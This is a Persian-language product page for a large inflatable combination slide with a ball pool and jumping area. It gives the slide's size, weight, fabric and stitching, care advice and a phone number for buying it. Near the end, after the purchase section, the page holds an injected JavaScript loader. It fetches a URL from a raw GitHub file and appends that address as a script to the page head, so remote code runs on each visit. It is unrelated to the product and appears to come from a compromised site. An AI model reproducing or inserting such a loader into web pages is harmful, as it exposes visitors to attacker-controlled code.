سرسره ترکیبی بادی
سرسره ترکیبی بادی

سرسره ترکیبی بادی

 • سرسره ترکیبی بادی یکی از سرسره های خاص بادی سازان مجد به حساب می اید. این دستگاه شمال یک سرسره دو سُر، یک استخر توپ و جامپینگ است. معمولا این دستگاه رو در شهر بازی ها و پارک که فضاتی مناسبی دارند استفاده می کنند. این دستگاه بزرگ ترین دستگاه ترکیبی تولدی بادی سازان مجد می باشد.

  ابعاد و اندازه 

  استخر توپ بادی در طول 9 متر و عرض 8.5 متر می و همچنین ارتفاع 7 متر می باشد وزن این قصر بادی ترکیبی 350 کیلو گرم است. این سرسره فقط در فاضا های سر باز می توانید استفاده کنیید.

  جنس پارچه و دوخت سرسره ترکیبی بادی

  پارچه اینسرسره ترکیبی بادی از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است.

  نحوه شستشوی و نگهداری

  نهگداری و شستشوی قصر بادی ترکیبی های بادی همه مثل هم هستند. باید بدانید که برای شستشوی قصر بادی ترکیبی فقط و فقط از آب استفاده کنید اگر از مواد شوینده مانند ریکا، وایتکس و … باعث پوسیدگی دستگاه می شود. برای نهگداری نکاتی هستند که باید شما بدانید. به هیچ وجه دستگاه ها را در هوای بارانی و طوفانی دستگاه ها را باد نکید، و هچنیین در صورت که هوای دستگاه رو تخلیه کردید روی آن روکش بکشید. نکته حتما دستگاه را با بند های که روی خود دستگاه هست با میخ های بزرگ به زمین ببندین.

  نحوه خرید سرسره ترکیبی بادی

  برای خرید سرسره ترکیبی بادی می توانید با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید. همچنین جهت مشاهده محصولات این دسته می توانید قصر بادی ترکیبی همین سایت مراجعه نمایید. برای اطلاعات بیشتر به این پست مراجه فرمایید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید